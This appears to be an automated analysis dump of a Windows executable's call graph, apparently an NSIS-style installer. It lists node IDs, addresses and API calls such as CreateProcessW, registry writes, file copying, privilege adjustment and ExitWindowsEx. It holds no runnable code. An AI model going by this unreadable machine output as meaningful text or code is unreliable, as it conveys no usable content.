GetDlgItem 5053->5054 5055 40549d 5053->5055 5098 40414e SendMessageW 5054->5098 5057 4054a6 GetDlgItem CreateThread CloseHandle 5055->5057 5058 4054ce 5055->5058 5057->5058 5060 4054f9 5058->5060 5061 4054e5 ShowWindow ShowWindow 5058->5061 5062 40551e 5058->5062 5059 405384 5067 40538b GetClientRect GetSystemMetrics SendMessageW SendMessageW 5059->5067 5064 405533 ShowWindow 5060->5064 5065 40550d 5060->5065 5068 405559 5060->5068 5100 40414e SendMessageW 5061->5100 5066 404180 8 API calls 5062->5066 5071 405553 5064->5071 5072 405545 5064->5072 5069 4040f2 SendMessageW 5065->5069 5070 40552c 5066->5070 5073 4053f9 5067->5073 5074 4053dd SendMessageW SendMessageW 5067->5074 5068->5062 5075 405567 SendMessageW 5068->5075 5069->5062 5080 4040f2 SendMessageW 5071->5080 5079 4051b4 25 API calls 5072->5079 5076 40540c 5073->5076 5077 4053fe SendMessageW 5073->5077 5074->5073 5075->5070 5078 405580 CreatePopupMenu 5075->5078 5082 404119 19 API calls 5076->5082 5077->5076 5081 406077 18 API calls 5078->5081 5079->5071 5080->5068 5083 405590 AppendMenuW 5081->5083 5084 40541c 5082->5084 5085 4055c0 TrackPopupMenu 5083->5085 5086 4055ad GetWindowRect 5083->5086 5087 405425 ShowWindow 5084->5087 5088 405459 GetDlgItem SendMessageW 5084->5088 5085->5070 5089 4055db 5085->5089 5086->5085 5090 405448 5087->5090 5091 40543b ShowWindow 5087->5091 5088->5070 5092 405480 SendMessageW SendMessageW 5088->5092 5093 4055f7 SendMessageW 5089->5093 5099 40414e SendMessageW 5090->5099 5091->5090 5092->5070 5093->5093 5094 405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5093->5094 5096 405639 SendMessageW 5094->5096 5096->5096 5097 405662 GlobalUnlock SetClipboardData CloseClipboard 5096->5097 5097->5070 5098->5059 5099->5088 5100->5060 5101 100016b6 5102 100016e5 5101->5102 5103 10001b18 22 API calls 5102->5103 5104 100016ec 5103->5104 5105 100016f3 5104->5105 5106 100016ff 5104->5106 5107 10001272 2 API calls 5105->5107 5108 10001726 5106->5108 5109 10001709 5106->5109 5112 100016fd 5107->5112 5110 10001750 5108->5110 5111 1000172c 5108->5111 5113 1000153d 3 API calls 5109->5113 5115 1000153d 3 API calls 5110->5115 5114 100015b4 3 API calls 5111->5114 5116 1000170e 5113->5116 5117 10001731 5114->5117 5115->5112 5118 100015b4 3 API calls 5116->5118 5119 10001272 2 API calls 5117->5119 5120 10001714 5118->5120 5121 10001737 GlobalFree 5119->5121 5122 10001272 2 API calls 5120->5122 5121->5112 5123 1000174b GlobalFree 5121->5123 5124 1000171a GlobalFree 5122->5124 5123->5112 5124->5112 5125 10002238 5126 10002296 5125->5126 5128 100022cc 5125->5128 5127 100022a8 GlobalAlloc 5126->5127 5126->5128 5127->5126 5129 401cfa GetDlgItem GetClientRect 5130 402bbf 18 API calls 5129->5130 5131 401d2c LoadImageW SendMessageW 5130->5131 5132 401d4a DeleteObject 5131->5132 5133 402a4c 5131->5133 5132->5133 4753 4027fb 4754 402bbf 18 API calls 4753->4754 4755 402802 FindFirstFileW 4754->4755 4756 40282a 4755->4756 4760 402815 4755->4760 4757 402833 4756->4757 4761 405f9c wsprintfW 4756->4761 4762 406055 lstrcpynW 4757->4762 4761->4757 4762->4760 4763 40237b 4764 402381 4763->4764 4765 402bbf 18 API calls 4764->4765 4766 402393 4765->4766 4767 402bbf 18 API calls 4766->4767 4768 40239d RegCreateKeyExW 4767->4768 4769 4023c7 4768->4769 4772 40281e 4768->4772 4770 4023e2 4769->4770 4771 402bbf 18 API calls 4769->4771 4774 402ba2 18 API calls 4770->4774 4776 4023ee 4770->4776 4773 4023d8 lstrlenW 4771->4773 4773->4770 4774->4776 4775 402409 RegSetValueExW 4778 40241f RegCloseKey 4775->4778 4776->4775 4777 403027 32 API calls 4776->4777 4777->4775 4778->4772 5134 1000103d 5135 1000101b 5 API calls 5134->5135 5136 10001056 5135->5136 5137 4014ff 5138 401507 5137->5138 5140 40151a 5137->5140 5139 402ba2 18 API calls 5138->5139 5139->5140 5141 401000 5142 401037 BeginPaint GetClientRect 5141->5142 5143 40100c DefWindowProcW 5141->5143 5145 4010f3 5142->5145 5146 401179 5143->5146 5147 401073 CreateBrushIndirect FillRect DeleteObject 5145->5147 5148 4010fc 5145->5148 5147->5145 5149 401102 CreateFontIndirectW 5148->5149 5150 401167 EndPaint 5148->5150 5149->5150 5151 401112 6 API calls 5149->5151 5150->5146 5151->5150 5152 401904 5153 40193b 5152->5153 5154 402bbf 18 API calls 5153->5154 5155 401940 5154->5155 5156 405846 69 API calls 5155->5156 5157 401949 5156->5157 5158 402d04 5159 402d16 SetTimer 5158->5159 5161 402d2f 5158->5161 5159->5161 5160 402d84 5161->5160 5162 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5161->5162 5162->5160 4512 402786 4513 4029f7 4512->4513 4514 40278d 4512->4514 4515 402ba2 18 API calls 4514->4515 4516 402798 4515->4516 4517 40279f SetFilePointer 4516->4517 4517->4513 4518 4027af 4517->4518 4520 405f9c wsprintfW 4518->4520 4520->4513 4563 100027c7 4564 10002817 4563->4564 4565 100027d7 VirtualProtect 4563->4565 4565->4564 5163 401907 5164 402bbf 18 API calls 5163->5164 5165 40190e 5164->5165 5166 40579a MessageBoxIndirectW 5165->5166 5167 401917 5166->5167 5168 401e08 5169 402bbf 18 API calls 5168->5169 5170 401e0e 5169->5170 5171 402bbf 18 API calls 5170->5171 5172 401e17 5171->5172 5173 402bbf 18 API calls 5172->5173 5174 401e20 5173->5174 5175 402bbf 18 API calls 5174->5175 5176 401e29 5175->5176 5177 401423 25 API calls 5176->5177 5178 401e30 ShellExecuteW 5177->5178 5179 401e61 5178->5179 5185 40490a 5186 404936 5185->5186 5187 40491a 5185->5187 5189 404969 5186->5189 5190 40493c SHGetPathFromIDListW 5186->5190 5196 40577e GetDlgItemTextW 5187->5196 5192 404953 SendMessageW 5190->5192 5193 40494c 5190->5193 5191 404927 SendMessageW 5191->5186 5192->5189 5195 40140b 2 API calls 5193->5195 5195->5192 5196->5191 5197 1000164f 5198 10001516 GlobalFree 5197->5198 5200 10001667 5198->5200 5199 100016ad GlobalFree 5200->5199 5201 10001682 5200->5201 5202 10001699 VirtualFree 5200->5202 5201->5199 5202->5199 4688 402095 4689 402bbf 18 API calls 4688->4689 4690 40209c 4689->4690 4691 402bbf 18 API calls 4690->4691 4692 4020a6 4691->4692 4693 402bbf 18 API calls 4692->4693 4694 4020b0 4693->4694 4695 402bbf 18 API calls 4694->4695 4696 4020ba 4695->4696 4697 402bbf 18 API calls 4696->4697 4699 4020c4 4697->4699 4698 402103 CoCreateInstance 4703 402122 4698->4703 4699->4698 4700 402bbf 18 API calls 4699->4700 4700->4698 4701 401423 25 API calls 4702 4021e1 4701->4702 4703->4701 4703->4702 5203 401a15 5204 402bbf 18 API calls 5203->5204 5205 401a1e ExpandEnvironmentStringsW 5204->5205 5206 401a32 5205->5206 5208 401a45 5205->5208 5207 401a37 lstrcmpW 5206->5207 5206->5208 5207->5208 5209 402515 5210 402bbf 18 API calls 5209->5210 5211 40251c 5210->5211 5214 405c2a GetFileAttributesW CreateFileW 5211->5214 5213 402528 5214->5213 5215 401b16 5216 402bbf 18 API calls 5215->5216 5217 401b1d 5216->5217 5218 402ba2 18 API calls 5217->5218 5219 401b26 wsprintfW 5218->5219 5220 402a4c 5219->5220 5221 10001058 5223 10001074 5221->5223 5222 100010dd 5223->5222 5224 10001516 GlobalFree 5223->5224 5225 10001092 5223->5225 5224->5225 5226 10001516 GlobalFree 5225->5226 5227 100010a2 5226->5227 5228 100010b2 5227->5228 5229 100010a9 GlobalSize 5227->5229 5230 100010b6 GlobalAlloc 5228->5230 5231 100010c7 5228->5231 5229->5228 5232 1000153d 3 API calls 5230->5232 5233 100010d2 GlobalFree 5231->5233 5232->5231 5233->5222 4780 40159b 4781 402bbf 18 API calls 4780->4781 4782 4015a2 SetFileAttributesW 4781->4782 4783 4015b4 4782->4783 4792 40229d 4793 4022a5 4792->4793 4794 4022ab 4792->4794 4795 402bbf 18 API calls 4793->4795 4796 4022b9 4794->4796 4797 402bbf 18 API calls 4794->4797 4795->4794 4798 4022c7 4796->4798 4799 402bbf 18 API calls 4796->4799 4797->4796 4800 402bbf 18 API calls 4798->4800 4799->4798 4801 4022d0 WritePrivateProfileStringW 4800->4801 5234 401f1d 5235 402bbf 18 API calls 5234->5235 5236 401f24 5235->5236 5237 40642b 5 API calls 5236->5237 5238 401f33 5237->5238 5239 401fb7 5238->5239 5240 401f4f GlobalAlloc 5238->5240 5240->5239 5241 401f63 5240->5241 5242 40642b 5 API calls 5241->5242 5243 401f6a 5242->5243 5244 40642b 5 API calls 5243->5244 5245 401f74 5244->5245 5245->5239 5249 405f9c wsprintfW 5245->5249 5247 401fa9 5250 405f9c wsprintfW 5247->5250 5249->5247 5250->5239 5251 40149e 5252 402288 5251->5252 5253 4014ac PostQuitMessage 5251->5253 5253->5252 5254 40249e 5255 402cc9 19 API calls 5254->5255 5256 4024a8 5255->5256 5257 402ba2 18 API calls 5256->5257 5258 4024b1 5257->5258 5259 4024d5 RegEnumValueW 5258->5259 5260 4024c9 RegEnumKeyW 5258->5260 5262 40281e 5258->5262 5261 4024ee RegCloseKey 5259->5261 5259->5262 5260->5261 5261->5262 5264 40231f 5265 402324 5264->5265 5266 40234f 5264->5266 5267 402cc9 19 API calls 5265->5267 5268 402bbf 18 API calls 5266->5268 5269 40232b 5267->5269 5270 402356 5268->5270 5271 402bbf 18 API calls 5269->5271 5274 40236c 5269->5274 5275 402bff RegOpenKeyExW 5270->5275 5272 40233c RegDeleteValueW RegCloseKey 5271->5272 5272->5274 5282 402c76 5275->5282 5283 402c2a 5275->5283 5276 402c50 RegEnumKeyW 5277 402c62 RegCloseKey 5276->5277 5276->5283 5279 40642b 5 API calls 5277->5279 5278 402c87 RegCloseKey 5278->5282 5281 402c72 5279->5281 5280 402bff 5 API calls 5280->5283 5281->5282 5284 402ca2 RegDeleteKeyW 5281->5284 5282->5274 5283->5276 5283->5277 5283->5278 5283->5280 5284->5282 3716 4032a0 SetErrorMode GetVersion 3717 4032d4 3716->3717 3718 4032da 3716->3718 3719 40642b 5 API calls 3717->3719 3807 4063bf GetSystemDirectoryW 3718->3807 3719->3718 3721 4032f1 3722 4063bf 3 API calls 3721->3722 3723 4032fb 3722->3723 3724 4063bf 3 API calls 3723->3724 3725 403305 3724->3725 3810 40642b GetModuleHandleA 3725->3810 3728 40642b 5 API calls 3729 403313 #17 OleInitialize SHGetFileInfoW 3728->3729 3816 406055 lstrcpynW 3729->3816 3731 403350 GetCommandLineW 3817 406055 lstrcpynW 3731->3817 3733 403362 GetModuleHandleW 3734 40337a 3733->3734 3818 405a36 3734->3818 3737 4034b4 GetTempPathW 3822 40326f 3737->3822 3739 4034cc 3740 4034d0 GetWindowsDirectoryW lstrcatW 3739->3740 3741 403526 DeleteFileW 3739->3741 3743 40326f 12 API calls 3740->3743 3832 402dee GetTickCount GetModuleFileNameW 3741->3832 3742 4033a2 3744 405a36 CharNextW 3742->3744 3749 40349d 3742->3749 3751 40349f 3742->3751 3747 4034ec 3743->3747 3744->3742 3746 40353a 3753 405a36 CharNextW 3746->3753 3789 4035dd 3746->3789 3802 4035ed 3746->3802 3747->3741 3748 4034f0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3747->3748 3752 40326f 12 API calls 3748->3752 3749->3737 3916 406055 lstrcpynW 3751->3916 3757 40351e 3752->3757 3770 403559 3753->3770 3757->3741 3757->3802 3758 403728 3761 403730 GetCurrentProcess OpenProcessToken 3758->3761 3762 4037ac ExitProcess 3758->3762 3759 403608 3940 40579a 3759->3940 3767 403748 LookupPrivilegeValueW AdjustTokenPrivileges 3761->3767 3768 40377c 3761->3768 3764 4035b7 3917 405b11 3764->3917 3765 40361e 3944 40571d 3765->3944 3767->3768 3769 40642b 5 API calls 3768->3769 3784 403783 3769->3784 3770->3764 3770->3765 3775 403798 ExitWindowsEx 3775->3762 3779 4037a5 3775->3779 3776 403634 lstrcatW 3777 40363f lstrcatW lstrcmpiW 3776->3777 3778 40365b 3777->3778 3777->3802 3782 403660 3778->3782 3783 403667 3778->3783 3982 40140b 3779->3982 3781 4035d2 3932 406055 lstrcpynW 3781->3932 3947 405683 CreateDirectoryW 3782->3947 3952 405700 CreateDirectoryW 3783->3952 3784->3775 3784->3779 3860 40389e 3789->3860 3791 40366c SetCurrentDirectoryW 3792 403687 3791->3792 3793 40367c 3791->3793 3956 406055 lstrcpynW 3792->3956 3955 406055 lstrcpynW 3793->3955 3798 4036d3 CopyFileW 3804 403695 3798->3804 3799 40371c 3801 405ef6 38 API calls 3799->3801 3801->3802 3933 4037c4 3802->3933 3803 406077 18 API calls 3803->3804 3804->3799 3804->3803 3806 403707 CloseHandle 3804->3806 3957 406077 3804->3957 3975 405ef6 MoveFileExW 3804->3975 3979 405735 CreateProcessW 3804->3979 3806->3804 3808 4063e1 wsprintfW LoadLibraryW 3807->3808 3808->3721 3811 406451 GetProcAddress 3810->3811 3812 406447 3810->3812 3814 40330c 3811->3814 3813 4063bf 3 API calls 3812->3813 3815 40644d 3813->3815 3814->3728 3815->3811 3815->3814 3816->3731 3817->3733 3819 405a3c 3818->3819 3820 403389 CharNextW 3819->3820 3821 405a43 CharNextW 3819->3821 3820->3737 3820->3742 3821->3819 3985 4062e9 3822->3985 3824 403285 3824->3739 3825 40327b 3825->3824 3994 405a09 lstrlenW CharPrevW 3825->3994 3828 405700 2 API calls 3829 403293 3828->3829 3997 405c59 3829->3997 4001 405c2a GetFileAttributesW CreateFileW 3832->4001 3834 402e2e 3853 402e3e 3834->3853 4002 406055 lstrcpynW 3834->4002 3836 402e54 4003 405a55 lstrlenW 3836->4003 3840 402e65 GetFileSize 3841 402f61 3840->3841 3859 402e7c 3840->3859 4008 402d8a 3841->4008 3843 402f6a 3845 402f9a GlobalAlloc 3843->3845 3843->3853 4043 403258 SetFilePointer 3843->4043 4019 403258 SetFilePointer 3845->4019 3846 402fcd 3850 402d8a 6 API calls 3846->3850 3849 402fb5 4020 403027 3849->4020 3850->3853 3851 402f83 3854 403242 ReadFile 3851->3854 3853->3746 3856 402f8e 3854->3856 3855 402d8a 6 API calls 3855->3859 3856->3845 3856->3853 3857 402fc1 3857->3853 3857->3857 3858 402ffe SetFilePointer 3857->3858 3858->3853 3859->3841 3859->3846 3859->3853 3859->3855 4040 403242 3859->4040 3861 40642b 5 API calls 3860->3861 3862 4038b2 3861->3862 3863 4038b8 GetUserDefaultUILanguage 3862->3863 3864 4038ca 3862->3864 4064 405f9c wsprintfW 3863->4064 4074 405f22 RegOpenKeyExW 3864->4074 3867 4038c8 4065 403b74 3867->4065 3869 403919 lstrcatW 3869->3867 3870 405f22 3 API calls 3870->3869 3873 405b11 18 API calls 3874 40394b 3873->3874 3875 4039df 3874->3875 3877 405f22 3 API calls 3874->3877 3876 405b11 18 API calls 3875->3876 3878 4039e5 3876->3878 3879 40397d 3877->3879 3880 4039f5 LoadImageW 3878->3880 3881 406077 18 API calls 3878->3881 3879->3875 3884 40399e lstrlenW 3879->3884 3888 405a36 CharNextW 3879->3888 3882 403a9b 3880->3882 3883 403a1c RegisterClassW 3880->3883 3881->3880 3887 40140b 2 API calls 3882->3887 3885 403a52 SystemParametersInfoW CreateWindowExW 3883->3885 3886 403aa5 3883->3886 3889 4039d2 3884->3889 3890 4039ac lstrcmpiW 3884->3890 3885->3882 3886->3802 3891 403aa1 3887->3891 3892 40399b 3888->3892 3894 405a09 3 API calls 3889->3894 3890->3889 3893 4039bc GetFileAttributesW 3890->3893 3891->3886 3896 403b74 19 API calls 3891->3896 3892->3884 3895 4039c8 3893->3895 3897 4039d8 3894->3897 3895->3889 3899 405a55 2 API calls 3895->3899 3900 403ab2 3896->3900 4079 406055 lstrcpynW 3897->4079 3899->3889 3901 403b41 3900->3901 3902 403abe ShowWindow 3900->3902 4080 405287 OleInitialize 3901->4080 3903 4063bf 3 API calls 3902->3903 3905 403ad6 3903->3905 3907 403ae4 GetClassInfoW 3905->3907 3910 4063bf 3 API calls 3905->3910 3906 403b47 3908 403b63 3906->3908 3909 403b4b 3906->3909 3912 403af8 GetClassInfoW RegisterClassW 3907->3912 3913 403b0e DialogBoxParamW 3907->3913 3911 40140b 2 API calls 3908->3911 3909->3886 3914 40140b 2 API calls 3909->3914 3910->3907 3911->3886 3912->3913 3915 40140b 2 API calls 3913->3915 3914->3886 3915->3886 3916->3749 4095 406055 lstrcpynW 3917->4095 3919 405b22 4096 405ab4 CharNextW CharNextW 3919->4096 3922 4035c3 3922->3802 3931 406055 lstrcpynW 3922->3931 3923 4062e9 5 API calls 3924 405b38 3923->3924 3924->3922 3925 405b69 lstrlenW 3924->3925 3930 405a55 2 API calls 3924->3930 4102 406398 FindFirstFileW 3924->4102 3925->3924 3926 405b74 3925->3926 3927 405a09 3 API calls 3926->3927 3929 405b79 GetFileAttributesW 3927->3929 3929->3922 3930->3925 3931->3781 3932->3789 3934 4037dc 3933->3934 3935 4037ce CloseHandle 3933->3935 4105 403809 3934->4105 3935->3934 3941 4057af 3940->3941 3942 4057c3 MessageBoxIndirectW 3941->3942 3943 403616 ExitProcess 3941->3943 3942->3943 3945 40642b 5 API calls 3944->3945 3946 403623 lstrcatW 3945->3946 3946->3776 3946->3777 3948 403665 3947->3948 3949 4056d4 GetLastError 3947->3949 3948->3791 3949->3948 3950 4056e3 SetFileSecurityW 3949->3950 3950->3948 3951 4056f9 GetLastError 3950->3951 3951->3948 3953 405710 3952->3953 3954 405714 GetLastError 3952->3954 3953->3791 3954->3953 3955->3792 3956->3804 3966 406084 3957->3966 3958 4062cf 3959 4036c6 DeleteFileW 3958->3959 4164 406055 lstrcpynW 3958->4164 3959->3798 3959->3804 3961 406137 GetVersion 3961->3966 3962 40629d lstrlenW 3962->3966 3965 406077 10 API calls 3965->3962 3966->3958 3966->3961 3966->3962 3966->3965 3967 405f22 3 API calls 3966->3967 3968 4061b2 GetSystemDirectoryW 3966->3968 3969 4061c5 GetWindowsDirectoryW 3966->3969 3970 4062e9 5 API calls 3966->3970 3971 4061f9 SHGetSpecialFolderLocation 3966->3971 3972 406077 10 API calls 3966->3972 3973 40623e lstrcatW 3966->3973 4162 405f9c wsprintfW 3966->4162 4163 406055 lstrcpynW 3966->4163 3967->3966 3968->3966 3969->3966 3970->3966 3971->3966 3974 406211 SHGetPathFromIDListW CoTaskMemFree 3971->3974 3972->3966 3973->3966 3974->3966 3976 405f17 3975->3976 3977 405f0a 3975->3977 3976->3804 4165 405d84 lstrcpyW 3977->4165 3980 405774 3979->3980 3981 405768 CloseHandle 3979->3981 3980->3804 3981->3980 3983 401389 2 API calls 3982->3983 3984 401420 3983->3984 3984->3762 3991 4062f6 3985->3991 3986 40636c 3987 406371 CharPrevW 3986->3987 3989 406392 3986->3989 3987->3986 3988 40635f CharNextW 3988->3986 3988->3991 3989->3825 3990 405a36 CharNextW 3990->3991 3991->3986 3991->3988 3991->3990 3992 40634b CharNextW 3991->3992 3993 40635a CharNextW 3991->3993 3992->3991 3993->3988 3995 40328d 3994->3995 3996 405a25 lstrcatW 3994->3996 3995->3828 3996->3995 3998 405c66 GetTickCount GetTempFileNameW 3997->3998 3999 40329e 3998->3999 4000 405c9c 3998->4000 3999->3739 4000->3998 4000->3999 4001->3834 4002->3836 4004 405a63 4003->4004 4005 402e5a 4004->4005 4006 405a69 CharPrevW 4004->4006 4007 406055 lstrcpynW 4005->4007 4006->4004 4006->4005 4007->3840 4009 402d93 4008->4009 4010 402dab 4008->4010 4011 402da3 4009->4011 4012 402d9c DestroyWindow 4009->4012 4013 402db3 4010->4013 4014 402dbb GetTickCount 4010->4014 4011->3843 4012->4011 4044 406467 4013->4044 4016 402dc9 CreateDialogParamW ShowWindow 4014->4016 4017 402dec 4014->4017 4016->4017 4017->3843 4019->3849 4021 403040 4020->4021 4022 40306e 4021->4022 4050 403258 SetFilePointer 4021->4050 4024 403242 ReadFile 4022->4024 4025 403079 4024->4025 4026 4031db 4025->4026 4027 40308b GetTickCount 4025->4027 4035 4031c5 4025->4035 4028 40321d 4026->4028 4033 4031df 4026->4033 4027->4035 4039 4030da 4027->4039 4029 403242 ReadFile 4028->4029 4029->4035 4030 403242 ReadFile 4030->4039 4031 403242 ReadFile 4031->4033 4032 405cdc WriteFile 4032->4033 4033->4031 4033->4032 4033->4035 4034 403130 GetTickCount 4034->4039 4035->3857 4036 403155 MulDiv wsprintfW 4051 4051b4 4036->4051 4039->4030 4039->4034 4039->4035 4039->4036 4048 405cdc WriteFile 4039->4048 4062 405cad ReadFile 4040->4062 4043->3851 4045 406484 PeekMessageW 4044->4045 4046 402db9 4045->4046 4047 40647a DispatchMessageW 4045->4047 4046->3843 4047->4045 4049 405cfa 4048->4049 4049->4039 4050->4022 4052 405271 4051->4052 4053 4051cf 4051->4053 4052->4039 4054 4051eb lstrlenW 4053->4054 4057 406077 18 API calls 4053->4057 4055 405214 4054->4055 4056 4051f9 lstrlenW 4054->4056 4059 405227 4055->4059 4060 40521a SetWindowTextW 4055->4060 4056->4052 4058 40520b lstrcatW 4056->4058 4057->4054 4058->4055 4059->4052 4061 40522d SendMessageW SendMessageW SendMessageW 4059->4061 4060->4059 4061->4052 4063 403255 4062->4063 4063->3859 4064->3867 4066 403b88 4065->4066 4087 405f9c wsprintfW 4066->4087 4068 403bf9 4069 406077 18 API calls 4068->4069 4070 403c05 SetWindowTextW 4069->4070 4071 403c21 4070->4071 4072 403929 4070->4072 4071->4072 4073 406077 18 API calls 4071->4073 4072->3873 4073->4071 4075 4038fa 4074->4075 4076 405f56 RegQueryValueExW 4074->4076 4075->3869 4075->3870 4078 405f77 RegCloseKey 4076->4078 4078->4075 4079->3875 4088 404165 4080->4088 4082 4052aa 4086 4052d1 4082->4086 4091 401389 4082->4091 4083 404165 SendMessageW 4084 4052e3 OleUninitialize 4083->4084 4084->3906 4086->4083 4087->4068 4089 40417d 4088->4089 4090 40416e SendMessageW 4088->4090 4089->4082 4090->4089 4093 401390 4091->4093 4092 4013fe 4092->4082 4093->4092 4094 4013cb MulDiv SendMessageW 4093->4094 4094->4093 4095->3919 4097 405ad1 4096->4097 4098 405ae3 4096->4098 4097->4098 4099 405ade CharNextW 4097->4099 4100 405b07 4098->4100 4101 405a36 CharNextW 4098->4101 4099->4100 4100->3922 4100->3923 4101->4098 4103 4063b9 4102->4103 4104 4063ae FindClose 4102->4104 4103->3924 4104->4103 4106 403817 4105->4106 4107 4037e1 4106->4107 4108 40381c FreeLibrary GlobalFree 4106->4108 4109 405846 4107->4109 4108->4107 4108->4108 4110 405b11 18 API calls 4109->4110 4111 405866 4110->4111 4112 405885 4111->4112 4113 40586e DeleteFileW 4111->4113 4115 4059b0 4112->4115 4149 406055 lstrcpynW 4112->4149 4114 4035f6 OleUninitialize 4113->4114 4114->3758 4114->3759 4115->4114 4120 406398 2 API calls 4115->4120 4117 4058ab 4118 4058b1 lstrcatW 4117->4118 4119 4058be 4117->4119 4121 4058c4 4118->4121 4122 405a55 2 API calls 4119->4122 4125 4059ca 4120->4125 4123 4058d4 lstrcatW 4121->4123 4124 4058ca 4121->4124 4122->4121 4126 4058df lstrlenW FindFirstFileW 4123->4126 4124->4123 4124->4126 4125->4114 4127 4059ce 4125->4127 4128 405901 4126->4128 4129 4059a5 4126->4129 4130 405a09 3 API calls 4127->4130 4132 405988 FindNextFileW 4128->4132 4142 405846 62 API calls 4128->4142 4144 4051b4 25 API calls 4128->4144 4146 4051b4 25 API calls 4128->4146 4148 405ef6 38 API calls 4128->4148 4150 406055 lstrcpynW 4128->4150 4151 4057fe 4128->4151 4129->4115 4131 4059d4 4130->4131 4133 4057fe 5 API calls 4131->4133 4132->4128 4136 40599e FindClose 4132->4136 4135 4059e0 4133->4135 4137 4059e4 4135->4137 4138 4059fa 4135->4138 4136->4129 4137->4114 4141 4051b4 25 API calls 4137->4141 4139 4051b4 25 API calls 4138->4139 4139->4114 4143 4059f1 4141->4143 4142->4128 4145 405ef6 38 API calls 4143->4145 4144->4132 4147 4059f8 4145->4147 4146->4128 4147->4114 4148->4128 4149->4117 4150->4128 4159 405c05 GetFileAttributesW 4151->4159 4154 40582b 4154->4128 4155 405821 DeleteFileW 4157 405827 4155->4157 4156 405819 RemoveDirectoryW 4156->4157 4157->4154 4158 405837 SetFileAttributesW 4157->4158 4158->4154 4160 40580a 4159->4160 4161 405c17 SetFileAttributesW 4159->4161 4160->4154 4160->4155 4160->4156 4161->4160 4162->3966 4163->3966 4164->3959 4166 405dd2 GetShortPathNameW 4165->4166 4167 405dac 4165->4167 4169 405ef1 4166->4169 4170 405de7 4166->4170 4192 405c2a GetFileAttributesW CreateFileW 4167->4192 4169->3976 4170->4169 4172 405def wsprintfA 4170->4172 4171 405db6 CloseHandle GetShortPathNameW 4171->4169 4173 405dca 4171->4173 4174 406077 18 API calls 4172->4174 4173->4166 4173->4169 4175 405e17 4174->4175 4193 405c2a GetFileAttributesW CreateFileW 4175->4193 4177 405e24 4177->4169 4178 405e33 GetFileSize GlobalAlloc 4177->4178 4179 405e55 4178->4179 4180 405eea CloseHandle 4178->4180 4181 405cad ReadFile 4179->4181 4180->4169 4182 405e5d 4181->4182 4182->4180 4194 405b8f lstrlenA 4182->4194 4185 405e74 lstrcpyA 4188 405e96 4185->4188 4186 405e88 4187 405b8f 4 API calls 4186->4187 4187->4188 4189 405ecd SetFilePointer 4188->4189 4190 405cdc WriteFile 4189->4190 4191 405ee3 GlobalFree 4190->4191 4191->4180 4192->4171 4193->4177 4195 405bd0 lstrlenA 4194->4195 4196 405ba9 lstrcmpiA 4195->4196 4198 405bd8 4195->4198 4197 405bc7 CharNextA 4196->4197 4196->4198 4197->4195 4198->4185 4198->4186 5285 100010e1 5288 10001111 5285->5288 5286 100011d8 GlobalFree 5287 100012ba 2 API calls 5287->5288 5288->5286 5288->5287 5289 100011d3 5288->5289 5290 10001272 2 API calls 5288->5290 5291 10001164 GlobalAlloc 5288->5291 5292 100011f8 GlobalFree 5288->5292 5293 100011c4 GlobalFree 5288->5293 5294 100012e1 lstrcpyW 5288->5294 5289->5286 5290->5293 5291->5288 5292->5288 5293->5288 5294->5288 5295 401ca3 5296 402ba2 18 API calls 5295->5296 5297 401ca9 IsWindow 5296->5297 5298 401a05 5297->5298 5299 402a27 SendMessageW 5300 402a41 InvalidateRect 5299->5300 5301 402a4c 5299->5301 5300->5301 4566 405128 4567 405138 4566->4567 4568 40514c 4566->4568 4570 405195 4567->4570 4571 40513e 4567->4571 4569 405154 IsWindowVisible 4568->4569 4578 405174 4568->4578 4569->4570 4573 405161 4569->4573 4574 40519a CallWindowProcW 4570->4574 4572 404165 SendMessageW 4571->4572 4575 405148 4572->4575 4580 404a7e SendMessageW 4573->4580 4574->4575 4578->4574 4585 404afe 4578->4585 4581 404aa1 GetMessagePos ScreenToClient SendMessageW 4580->4581 4582 404add SendMessageW 4580->4582 4583 404ad5 4581->4583 4584 404ada 4581->4584 4582->4583 4583->4578 4584->4582 4594 406055 lstrcpynW 4585->4594 4587 404b11 4595 405f9c wsprintfW 4587->4595 4589 404b1b 4590 40140b 2 API calls 4589->4590 4591 404b24 4590->4591 4596 406055 lstrcpynW 4591->4596 4593 404b2b 4593->4570 4594->4587 4595->4589 4596->4593 4597 40242a 4608 402cc9 4597->4608 4599 402434 4600 402bbf 18 API calls 4599->4600 4601 40243d 4600->4601 4602 402448 RegQueryValueExW 4601->4602 4603 40281e 4601->4603 4604 402468 4602->4604 4607 40246e RegCloseKey 4602->4607 4604->4607 4612 405f9c wsprintfW 4604->4612 4607->4603 4609 402bbf 18 API calls 4608->4609 4610 402ce2 4609->4610 4611 402cf0 RegOpenKeyExW 4610->4611 4611->4599 4612->4607 5302 40422d lstrcpynW lstrlenW 5303 40172d 5304 402bbf 18 API calls 5303->5304 5305 401734 SearchPathW 5304->5305 5306 40174f 5305->5306 4613 404b30 GetDlgItem GetDlgItem 4614 404b82 7 API calls 4613->4614 4617 404d9b 4613->4617 4615 404c25 DeleteObject 4614->4615 4616 404c18 SendMessageW 4614->4616 4618 404c2e 4615->4618 4616->4615 4624 404e60 4617->4624 4627 404e7f 4617->4627 4631 404dfb 4617->4631 4619 404c65 4618->4619 4620 404c3d 4618->4620 4621 404119 19 API calls 4619->4621 4623 406077 18 API calls 4620->4623 4625 404c79 4621->4625 4622 404f2b 4628 404f35 SendMessageW 4622->4628 4629 404f3d 4622->4629 4630 404c47 SendMessageW SendMessageW 4623->4630 4624->4627 4636 404e71 SendMessageW 4624->4636 4633 404119 19 API calls 4625->4633 4626 405113 4635 404180 8 API calls 4626->4635 4627->4622 4627->4626 4634 404ed8 SendMessageW 4627->4634 4628->4629 4637 404f56 4629->4637 4638 404f4f ImageList_Destroy 4629->4638 4645 404f66 4629->4645 4630->4618 4632 404a7e 5 API calls 4631->4632 4650 404e0c 4632->4650 4651 404c87 4633->4651 4634->4626 4640 404eed SendMessageW 4634->4640 4641 405121 4635->4641 4636->4627 4642 404f5f GlobalFree 4637->4642 4637->4645 4638->4637 4639 4050d5 4639->4626 4646 4050e7 ShowWindow GetDlgItem ShowWindow 4639->4646 4644 404f00 4640->4644 4642->4645 4643 404d5c GetWindowLongW SetWindowLongW 4647 404d75 4643->4647 4655 404f11 SendMessageW 4644->4655 4645->4639 4660 404afe 4 API calls 4645->4660 4663 404fa1 4645->4663 4646->4626 4648 404d93 4647->4648 4649 404d7b ShowWindow 4647->4649 4670 40414e SendMessageW 4648->4670 4669 40414e SendMessageW 4649->4669 4650->4624 